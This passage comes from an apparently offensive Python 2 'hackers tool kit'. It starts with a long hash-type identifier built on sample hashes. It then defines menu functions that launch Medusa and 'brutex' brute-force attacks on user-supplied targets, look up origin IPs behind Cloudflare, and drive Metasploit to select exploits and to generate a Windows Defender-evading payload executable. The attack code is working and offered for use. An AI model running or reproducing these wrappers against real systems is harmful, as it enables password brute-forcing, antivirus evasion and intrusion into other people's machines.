Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A 